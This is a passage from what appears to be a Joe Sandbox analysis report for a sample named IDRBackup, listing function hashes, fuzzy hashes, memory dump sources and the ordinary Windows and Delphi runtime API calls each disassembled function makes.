                                                                                                  • Opcode Fuzzy Hash: 3740d5a8882292424296d33065260b11a727ea2989f92afca789f2fadf23aca0
                                                                                                  • Instruction Fuzzy Hash: B211E9C3E011A085F7B42700D8322E722E2EB93B517EA0356CC80CB656F2A34C91D55F
                                                                                                  APIs
                                                                                                  • GetThreadLocale.KERNEL32 ref: 50028BF6
                                                                                                  • GetSystemMetrics.USER32(0000004A), ref: 50028C47
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: LocaleMetricsSystemThread
                                                                                                  • String ID: HlP
                                                                                                  • API String ID: 3035471613-2947359988
                                                                                                  • Opcode ID: b0f5541512791debc26a8671445bd5c5934f552fcd55d97c6b110629674566dc
                                                                                                  • Instruction ID: 10459d71cf64cf038303f9a9cea68570e56e651b364d0c8a3b35f290a598fd13
                                                                                                  • Opcode Fuzzy Hash: b0f5541512791debc26a8671445bd5c5934f552fcd55d97c6b110629674566dc
                                                                                                  • Instruction Fuzzy Hash: 9A012D741072D28EEB108F65F88536277E89B51254F24C2ABDD489F287DB39C846C7B5
                                                                                                  APIs
                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,GetFileAttributesExW), ref: 5001BB8D
                                                                                                    • Part of subcall function 5000E884: GetProcAddress.KERNEL32(?,?), ref: 5000E8A8
                                                                                                    • Part of subcall function 5000E884: @System@@LStrClr$qqrpv.RTL120(5000E8EE,?,?,00000000), ref: 5000E8E1
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AddressClr$qqrpvHandleModuleProcSystem@@
                                                                                                  • String ID: GetFileAttributesExW$kernel32.dll
                                                                                                  • API String ID: 3679075934-3171891112
                                                                                                  • Opcode ID: 33b27a9e80b64f9f74edf5c1de5c6d6a4e39c05bd2065b4b5f612ff5d03c5c33
                                                                                                  • Instruction ID: e514f51dd8fb537dfb01239488a6553f3399445b9a4cbebaef623d1d0cc912b9
                                                                                                  • Opcode Fuzzy Hash: 33b27a9e80b64f9f74edf5c1de5c6d6a4e39c05bd2065b4b5f612ff5d03c5c33
                                                                                                  • Instruction Fuzzy Hash: 3AE04F71445288AFD700EF94ED44FAA379CBB98210F408D0BF60987510CB74D482CBA0
                                                                                                  APIs
                                                                                                  • @System@@RewritText$qqrr15System@TTextRec.RTL120(?,50005E83), ref: 50005D80
                                                                                                  • @System@SetInOutRes$qqri.RTL120(?,50005E83), ref: 50005D99
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$Res$qqriRewritSystem@@TextText$qqrr15
                                                                                                  • String ID: 0CP
                                                                                                  • API String ID: 2995044334-842509658
                                                                                                  • Opcode ID: 307c06a35ed04e922cfdbbcf6000164576624c71684b84ee2fc310da7f03048e
                                                                                                  • Instruction ID: eabc5bede8330fcccc3b4369240e300fe8af7b4666d213e9db6d5ee23a722cab
                                                                                                  • Opcode Fuzzy Hash: 307c06a35ed04e922cfdbbcf6000164576624c71684b84ee2fc310da7f03048e
                                                                                                  • Instruction Fuzzy Hash: A8D02B453073C08AFB206FF438E010482A05F88002784CB67EC45CB247E569C9405326
                                                                                                  APIs
                                                                                                  • @System@@ResetText$qqrr15System@TTextRec.RTL120(?,5000549E,?,500050BF), ref: 5000546C
                                                                                                  • @System@SetInOutRes$qqri.RTL120(?,5000549E,?,500050BF), ref: 50005485
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$Res$qqriResetSystem@@TextText$qqrr15
                                                                                                  • String ID: `@P
                                                                                                  • API String ID: 3749152163-4219215009
                                                                                                  • Opcode ID: 474c6b335946cc709f9bfe439fa6d2f0613b7dda503e967d2b86d165faebaa74
                                                                                                  • Instruction ID: 3488a2e08867437c2cb3a72290a42c38b3174c830ac736cddd9b2ab7f76a7471
                                                                                                  • Opcode Fuzzy Hash: 474c6b335946cc709f9bfe439fa6d2f0613b7dda503e967d2b86d165faebaa74
                                                                                                  • Instruction Fuzzy Hash: B8D05E897472D08ABB40AFF828F029495A05B48152B84D667FD84CB253E659CA549365